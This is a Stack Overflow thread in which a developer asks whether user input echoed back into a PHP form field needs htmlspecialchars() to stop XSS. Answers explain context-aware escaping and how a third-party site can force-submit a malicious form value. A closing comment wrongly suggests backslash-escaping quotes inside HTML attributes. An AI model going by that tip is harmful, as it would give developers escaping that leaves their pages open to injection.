0

Apologies if this has been asked before - but in this case I feel there is an overload of information out there, rather than too little. There also appears to be conflicting opinions everywhere I look. Any clarification would be much appreciated.

I have a user sign-up form. I have validated the different fields, but I haven't used any sanitization functions on the data (e.g. htmlspecialchars) because I read here that it's best to leave that until output (e.g on a user profile). I am using PDO prepared statements to insert my data, so I am safe there as far as I know.

However, having run my domain through various vulnerability scanners, they reported that my sign-up form was very unsafe - and could be victim to XSS attacks. I believe the snippet of code causing this is as follows:

<input type="text" placeholder="Username" name="user" maxlength="32" value="<?php echo test_input($user); ?>" pattern="^[a-zA-Z0-9]*$" required>

I am echo-ing that user's input back into the form in case they have an error in another field, so as to re-submit after correction. Therefore potentially harmful script could be echoed into the page.

However, surely this is only the input from that specific user? The only harm they could cause is to themselves? Is the scanner mistaken or am I largely unaware of the risk?

I have fields for general strings, email address, URLs. What steps do I take to ensure safety for visitors to my site?

Thank you very much for any help/clarification you can give me!

EDIT

function test_input($data)
    {
    $data = trim($data);
    $data = stripslashes($data);
    $data = htmlspecialchars($data, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return $data;
    }
user2228716
  • 115
  • 9
  • What does `test_input()` do? – Niet the Dark Absol Aug 08 '17 at 11:59
  • Sorry, that's the function that I have now added to prevent dangerous script from running. I will add it to the original post. Basically my question is if it is necessary at this stage, or if I just return exactly what the user inputted? Thanks for pointing that out. – user2228716 Aug 08 '17 at 12:02
  • [The Great Escapism (Or: What You Need To Know To Work With Text Within Text)](http://kunststube.net/escapism/) – deceze Aug 08 '17 at 12:03

2 Answers2

0

Do I need to htmlspecialchars() user input in an HTML form to prevent XSS?

You need something. htmlspecialchars is generally a good choice. It is simple and doesn't destroy the input.

However, surely this is only the input from that specific user?

It is on the input from that specific user's browser.

That user might have visited an evil third party site, that puts an XSS attack as the default value of an input in a form on their site. Then they set the action of the form to your site. Then they submit the form with JS.

Result: Their code is injected into your site by the user's browser, and their JS is executed on your site (with access to the user's cookies and session).

Quentin
  • 914,110
  • 126
  • 1,211
  • 1,335
  • Ah, now that makes perfect sense! Thank you so much. So I can submit the original user input into my database (provided I htmlspecialchars it on output), but when echo-ing user input back into the form for corrections - I should htmlspecialchars it too in case of your given scenario? – user2228716 Aug 08 '17 at 12:16
0

When inserting any variables into another context, you should also run them through htmlspecialchars() (or noHTML() above) to ensure they don't break out and add extra attributes to the parent element.

This is safe:

<input type="text" name="username" value="<?php echo noHTML($htmlp->purify($_GET['username'])); ?>" />

This, too, is safe against XSS attacks, but still a bad idea:

<?php echo $htmlp->purify("<input type=\"text\" name=\"username\" value=\"".$_GET['username']."\" />"); ?>

As it turns out, context matters a lot for preventing cross-site scripting attacks. What's secure in one context (e.g. HTML is allowed) could be disastrous in other contexts (e.g. we're in the middle of an HTML attribute).

Full Source: https://paragonie.com/blog/2015/06/preventing-xss-vulnerabilities-in-php-everything-you-need-know

Shahroze Nawaz
  • 589
  • 5
  • 9
  • That's a great source, thanks a lot. I agree to use ENT_QUOTES for security, however, what if I want to permit single quotations (') in one of my fields? Otherwise wouldn't "I don't like XSS attacks" be outputted as something like "I don't like XSS"? – user2228716 Aug 08 '17 at 12:25
  • you can escape the quote with a backslash ` "I don\'t like XSS attacks" `. if you find my answer usefull give it upvote:) – Shahroze Nawaz Aug 08 '17 at 12:53